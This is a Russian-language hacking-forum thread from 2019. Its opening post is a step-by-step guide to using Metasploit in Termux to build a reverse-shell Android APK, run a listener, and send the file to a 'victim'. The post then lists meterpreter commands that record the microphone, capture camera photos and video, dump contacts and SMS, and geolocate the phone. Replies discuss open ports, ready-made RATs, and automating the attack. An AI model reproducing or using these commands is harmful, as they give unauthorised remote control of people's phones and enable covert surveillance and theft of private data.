Загрузка...

Hacking an Android user from another phone.

Thread in Virology created by onemind Jun 11, 2019. 2032 views

  1. onemind
    onemind Topic starter Jun 11, 2019 27 Mar 22, 2018
    Скачиваем и установливаем Termux.
    Устанавливаем metasploit.

    Даём разрешение на сохранение файлов в корневой папки телефона.

    Заходим в разрешения приложений>Память
    Ставим галочку напротив Termux

    Далее открываем metasploit командой "msfconsole"
    Узнаём свой IP командой "ifconfig"
    Пишем "msfvenom -p android/meterpreter/reverse_tcp LHOST=СВОЙ ИП LPORT=4444 R > 1.apk"
    Файл сохраняется в /data/data/com.termux/files/home ,также можно изменить место сохранения файла.
    Пишем "use multi/handler"
    Пишем "set payload android/meterpreter/reverse_tcp"
    Пишем "set LHOST СВОЙ ИП"
    Пишем "set LPORT 4444"
    Запускаем "exploit"
    Теперь кидаем файл жертве. Жертва открывает файл и устанавливает приложение. Когда жертва его установит,то у нас в консоли высветятся данные о жертве , его ИП , юсер-агент,время запуска и т.п
    После того ,как у нас появилось, это сообщение то и появится доступ к вводу в консоль.
    Напишу, что же может данный exploit.
    Данные команды нужно вводить в консоль после того,как жертва запустит и установит файл.
    record_mic - Запись с микрофона.
    webcam_snap - Делает онли фото с основной камеры (качество не самое лучшее)
    webcam_stream - Записывает видео (Качество тоже не самое лучшее)
    dump_contacts - Сохраняет контакты с sim-карты
    dump_sms - Сохраняет смс с sim-карты
    geolocate - Показывает местоположение телефона, координаты
    КОПИРОВАТЬ И ВСТАВЛЯТЬ КОМАНДЫ НУЖНО БЕЗ КАВЫЧЕК ,ЭТО ОБЯЗАТЕЛЬНО.
     
  2. Qkston
    Qkston Jun 11, 2019 EZ4ME 24 Jul 21, 2018
    можно просматривать и скачивать файли с тел. жерты?
     
  3. Kom1SsAr
    Kom1SsAr Jun 11, 2019 Ищу работу 163 Sep 3, 2018
    смысл делать столько действий, если есть ратник который собирается в пару кликов
     
  4. Kiri4ok
    Kiri4ok Jun 11, 2019 0 Nov 23, 2018
    По-моему для метасплоита нужно открывать порты или находится с жертвой в одной сети. Могу ошибаться
     
  5. onemind
    onemind Topic starter Jun 12, 2019 27 Mar 22, 2018
    Kom1SsAr, увидел просто на форуме - чел спрашивал про то как с телефона сделать что то подобное на ратник.. Возможно кому то пригодится )
     
  6. onemind
    onemind Topic starter Jun 12, 2019 27 Mar 22, 2018
    Kiri4ok, Возможно (тоже пол это думал) , но сам лично не тестил, увидел на одном форуме..
     
  7. Kiri4ok
    Kiri4ok Jun 12, 2019 0 Nov 23, 2018
    onemind, Я протестил. Все так как я сказал
     
  8. Forzeonelove
    Forzeonelove Jun 12, 2019 Banned 57 May 28, 2019
    Слишком сложно
     
  9. mrros
    mrros Jun 15, 2019 19 Apr 15, 2019
    А есть чтото пороще и через интернет. На хост поставить панельек и охотитса?)
     
  10. Dicoysilver
    Dicoysilver Jun 19, 2019 Banned 1 Jun 16, 2019
    Автоматизировать бы,а то каждый раз стирать руки не кайф
     
Loading...
Top